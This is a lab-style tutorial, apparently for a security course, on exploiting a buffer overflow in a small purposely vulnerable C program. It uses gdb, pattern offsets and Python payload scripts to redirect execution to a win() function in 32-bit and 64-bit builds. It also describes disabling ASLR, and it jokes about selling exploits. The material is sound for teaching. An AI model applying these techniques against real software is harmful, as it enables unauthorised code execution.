Linux Buffer Overflow Without Shellcode
Last updated
The goal is to develop a very simple buffer overflow exploit on Linux that alters execution to bypass a password check. This will give you practice with these techniques:
Writing very simple C code
Compiling with gcc
Debugging with gdb, both 32-bit and 64-bit
Understanding the registers $esp, $ebp, and $eip
Understanding the structure of the stack
Using Python to create simple text patterns
This program asks for a password. The function test_pw() uses simple bitwise manipulations to obfuscate the password comparison, so that the correct password does not appear literally in the source code. The test_pw() function reserves room for 10 characters but reads up to 50 characters from stdin, which allows a buffer overflow. It also returns 1, so the win() function is never executed. Our goal is to print "Fucking Hell! You are HACKERMAN!" by exploiting the buffer overflow.
The first step is to compile the program with the -m32 flag, which builds it as a 32-bit executable, and the -g switch, which adds debugging information to the executable. Then we can use the file command to see information about the executable, and run it to test its functionality.
With this information we can conclude that it successfully compiled into a 32-bit executable (ELF 32-bit
file), and that the program exits normally with the "FAIL!" message.
The next step is to try to crash the program.
We did crash the program and received a "Segmentation fault" message, which suggests a buffer overflow vulnerability.
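An input long enough to overrun the buffer can be generated rather than typed. The following is a minimal Python 3 sketch; the helper name `make_pattern` and the layout of four repeated letters per group are assumptions for illustration, chosen so that each 4-byte word on the stack is easy to recognise in the debugger.

```python
import string


def make_pattern(groups: int = 10, width: int = 4) -> str:
    """Return 'AAAABBBBCCCC...' built from `groups` letters, each repeated `width` times."""
    if not 1 <= groups <= 26:
        raise ValueError("groups must be between 1 and 26")
    return "".join(letter * width for letter in string.ascii_uppercase[:groups])


if __name__ == "__main__":
    # 40 characters: well past the 10 bytes reserved for the password,
    # but still within the 50-character read limit.
    print(make_pattern())
```

The output can be pasted at the password prompt or redirected into the program's standard input.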
Address Space Layout Randomization (ASLR) is a defensive feature that makes buffer overflows harder to exploit. Modern operating systems enable it by default.
If we run the program several times, we can notice that the password address is different every time, as shown below.
For the first part of the book/course, we don't need ASLR so we can turn it off to make things easier.
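On Linux the ASLR setting is exposed through the file /proc/sys/kernel/randomize_va_space. The sketch below only reads and interprets that value; the function names `read_aslr` and `describe_aslr` are made up for this example, and the sketch assumes a kernel that exposes this file.

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base, shared libraries)",
    2: "full (partial plus heap)",
}


def describe_aslr(value: int) -> str:
    """Translate the numeric setting into a short description."""
    return ASLR_MODES.get(value, f"unknown mode {value}")


def read_aslr(path: Path = ASLR_PATH):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    mode = read_aslr()
    if mode is None:
        print("ASLR setting is not readable on this system")
    else:
        print(f"randomize_va_space = {mode}: {describe_aslr(mode)}")
    # Writing 0 to the same file as root turns ASLR off until the next reboot.
```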
Now if we run the program multiple times like before, the password address will remain the same every time, as shown below.
Now we can debug the program with gdb in "quiet" mode (the -q flag suppresses the banner message), list the source code of the test_pw function, and set a breakpoint after the gets() call.
Now we can run the program and give it an input of ten A's as the password, then use info registers to display the contents of the registers, and use x/12x $esp to examine 12 words of memory starting at the address held in $esp and analyze the stack frame.
The important registers outlined in green above are:
$eip (extended instruction pointer)
$esp (the top of the stack frame)
$ebp (the bottom of the stack frame)
The first thing to notice is that $eip points to <test_pw+84>, which means that execution is currently inside the test_pw function.
$esp is the start (top) of the stack frame, at 0xffffd5c0
in the image above.
$ebp is at 0xffffd5d8 and is the end (bottom) of the stack frame. The frame between $esp and $ebp contains the local variables of the test_pw function, along with other bookkeeping data.
The password we entered, ten A's, appears on the stack as ten "41" hexadecimal values, outlined in yellow in the image above.
And finally, the word immediately after the stack frame is the saved return pointer, outlined in red in the image above. When the function returns, this value is placed into $eip.
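The layout described above can be modelled with a small byte array. This is a toy sketch, not a dump of the real process: the $esp and $ebp values come from the gdb session, while the buffer position (`BUF`) and the original return address (`ORIGINAL_RET`) are assumptions made for illustration, since the real values depend on the compiler and the binary.

```python
import struct

ESP = 0xFFFFD5C0   # top of the frame, as reported by gdb
EBP = 0xFFFFD5D8   # bottom of the frame, as reported by gdb
RET = EBP + 4      # the saved return pointer follows the saved $ebp
BUF = ESP + 6      # ASSUMPTION: where the 10-byte password buffer starts
ORIGINAL_RET = 0x56555700  # HYPOTHETICAL return address back into the caller


def fill_frame(user_input: bytes) -> bytearray:
    """Model 12 words starting at $esp and copy the input in with no bounds check."""
    frame = bytearray(12 * 4)
    struct.pack_into("<I", frame, RET - ESP, ORIGINAL_RET)
    start = BUF - ESP
    frame[start:start + len(user_input)] = user_input
    return frame


def saved_return(frame: bytearray) -> int:
    """Read the 32-bit little-endian word stored in the return pointer slot."""
    return struct.unpack_from("<I", frame, RET - ESP)[0]


def dump_words(frame: bytearray, count: int = 12) -> str:
    """Format memory roughly like gdb's x/12x $esp: four words per row."""
    words = struct.unpack_from(f"<{count}I", frame, 0)
    rows = []
    for i in range(0, count, 4):
        row = " ".join(f"{w:#010x}" for w in words[i:i + 4])
        rows.append(f"{ESP + 4 * i:#010x}: {row}")
    return "\n".join(rows)


if __name__ == "__main__":
    frame = fill_frame(b"A" * 10)
    print(dump_words(frame))
    print(f"saved return pointer: {saved_return(frame):#010x}")
```

With ten A's the return pointer slot keeps its original value. Any input long enough to reach that slot replaces it, which is what makes the overflow exploitable.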
By running the program with a longer password, we can see that the RET value now contains 0x47474646. An ASCII table shows that these are the hexadecimal codes for "FFGG" in reverse byte order (little-endian).
By typing continue
, the program throws a "Segmentation fault" error, and we can see that the $eip register now holds 0x47474646
, which means that the characters "FFGG" ended up in $eip.
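To turn the value seen in $eip into a position within the input, the register value can be converted back to bytes and searched for in the pattern. This sketch assumes the longer password was the 40-character pattern "AAAABBBB...JJJJ", which is consistent with "FFGG" landing in $eip; the function name `offset_of` is hypothetical.

```python
# ASSUMPTION: the overflowing input was this 40-character pattern.
PATTERN = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"


def offset_of(value: int, size: int = 4, pattern: bytes = PATTERN) -> int:
    """Return the index in `pattern` of the bytes loaded as `value`, or -1 if absent."""
    raw = value.to_bytes(size, "little")   # undo the little-endian load
    return pattern.find(raw)


if __name__ == "__main__":
    print((0x47474646).to_bytes(4, "little"))   # b'FFGG'
    print(offset_of(0x47474646))                # 22
```

An offset of 22 means that 22 bytes of input come before the four bytes that overwrite the saved return pointer.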
Since we now have control of the $eip register, we can go to any address we want, and we can use that to go to the win
function.
By typing disassemble win
we can see the assembly code of the win
function, and that it starts at the address 0x5655566e
as shown below.
Now we can quit the debugger and create an exploit file.
To create an exploit file that takes us to the win function, we need three variables: a prefix holding the password characters that come before the "FFGG" that took over the $eip register, a second variable holding the address of the beginning of the win function (0x5655566e) in place of those four characters, and a postfix holding the rest of the characters. The image below shows the exploit code in Python.
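Since the original listing is an image, here is a comparable sketch in Python 3 rather than a copy of it. It assumes the 40-character "AAAABBBB...JJJJ" pattern, with "FFGG" at offset 22, and the win address found in gdb above; the function name `build_payload` is made up for this example.

```python
import struct
import sys

WIN_ADDR = 0x5655566E   # start of win(), from `disassemble win`


def build_payload(addr: int = WIN_ADDR) -> bytes:
    """Return prefix + little-endian address + postfix + newline (41 bytes)."""
    prefix = b"AAAABBBBCCCCDDDDEEEEFF"   # ASSUMPTION: 22 bytes before the saved return pointer
    eip = struct.pack("<I", addr)         # the address as 4 little-endian bytes
    postfix = b"GGHHHHIIIIJJJJ"           # the rest of the original pattern
    return prefix + eip + postfix + b"\n"


if __name__ == "__main__":
    # Write raw bytes; print() would encode text and could alter non-ASCII values.
    sys.stdout.buffer.write(build_payload())
```

For this particular address the four replacement bytes happen to be printable ("nVUV"), so the output still looks like ordinary letters.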
We now need to make the exploit script executable and run it.
The script prints out the letters, with four letters in the middle changed, as shown above. The next step is to put the output into a file that we will name attack-pwd32 and confirm that it holds 41 characters with the command ls -l.
By loading the program in the gdb debugging environment, we can list the source code of the test_pw function and set a breakpoint after the password input, then run the program with our exploit file as its input.
As we can see above, the RET value (outlined in green) is now 0x5655566e, which is the address of the start of the win function. By typing continue we can see that we get our message from the win function as desired. Then the program crashes, because we changed only the saved $eip and did not also adjust the saved $ebp, so the program cannot return normally from the win() function.
The debugger is not a perfect simulation of the real shell, and often exploits that work in gdb need some adjustments to work outside of it. In this case, our exploit doesn't need any adjustment because we see the winning message.
To compile the code as a 64-bit executable we use the same command, but without the -m32 flag.
We can see that the program is an ELF 64-bit
file as expected and that it exits normally with the "FAIL!" message.
We can also make it crash the same way we did with the 32-bit program.
Now we can open the program with gdb
and observe the stack without an overflow to debug it.
We can see that the stack layout is similar to the 32-bit case, but now we have 64-bit registers and addresses, as shown above.
The instruction pointer is $rip, $rsp is the start of the stack frame (top of the stack), and $rbp is the end of the stack frame (bottom of the stack).
The password we entered, ten A's, appears on the stack as ten "41" hexadecimal values, outlined in yellow in the image above.
The 64-bit word immediately after the stack frame is the saved return pointer, outlined in red in the image above. When the function returns, this value is placed into $rip.
We can now run the program again in gdb to cause the buffer overflow and examine $rsp.
We can see that the RET
value now contains the hexadecimal codes for "EEFFFFGG" in reverse order. When typing continue the program returns a "Segmentation fault" error. Now we need to follow the same process as with the 32-bit program and find the start of the win()
function's address.
As shown above, the address at the start of the win()
function is 0x00005555555547d0
.
Now we get to the complicated part. Python 2 is deprecated and no longer updated, which means we should not rely on it for exploit development from now on. Python 3 strictly separates text strings from raw bytes, which makes emitting arbitrary byte values more awkward than it was in Python 2. Although it is still possible to process raw bytes with Python 3, I will do this example in Golang. I chose Golang because it is faster than Python, compiles easily for both Windows and Linux, and produces a standalone binary/executable that has to be reverse engineered to be understood, which means the exploits are more valuable (and can be sold lmao).
Now back to the exploit: having the address of the start of the win() function, we can create our exploit.
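For readers who want to follow along without Go, the same payload can be sketched in Python 3. This is not the Go program used in this walkthrough. It assumes the same 40-character "AAAABBBB...JJJJ" pattern, in which "EEFFFFGG" sits at offset 18, and it writes through sys.stdout.buffer so the bytes reach the output unmodified; the function name `build_payload64` is hypothetical.

```python
import struct
import sys

WIN_ADDR_64 = 0x00005555555547D0   # start of win() in the 64-bit build, from gdb


def build_payload64(addr: int = WIN_ADDR_64) -> bytes:
    """Return prefix + 8-byte little-endian address + postfix + newline (41 bytes)."""
    prefix = b"AAAABBBBCCCCDDDDEE"    # ASSUMPTION: 18 bytes before the saved return pointer
    rip = struct.pack("<Q", addr)      # the address as 8 little-endian bytes
    postfix = b"GGHHHHIIIIJJJJ"        # the rest of the original pattern
    return prefix + rip + postfix + b"\n"


if __name__ == "__main__":
    sys.stdout.buffer.write(build_payload64())
```

The eight replaced bytes include 0xd0 and two zero bytes, which is why part of the output is unprintable.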
We can now build our Go exploit into an executable, and by running it we can see that the program prints out the letters, with eight letters in the middle changed, some of them unprintable, as shown below.
By putting the output into a new file named attackgo-pwd64
we can use the ls -l
command to see that it contains 41 characters, as shown below.
We can now test the exploit in the gdb debugger. We set a breakpoint after the password is input and run the program with our exploit file.
As we can see, the RET value (outlined in green) is now the address of the start of the win() function (in reverse byte order, since the machine is little-endian), as shown above.
By pressing continue
we can see the desired message from the win()
function.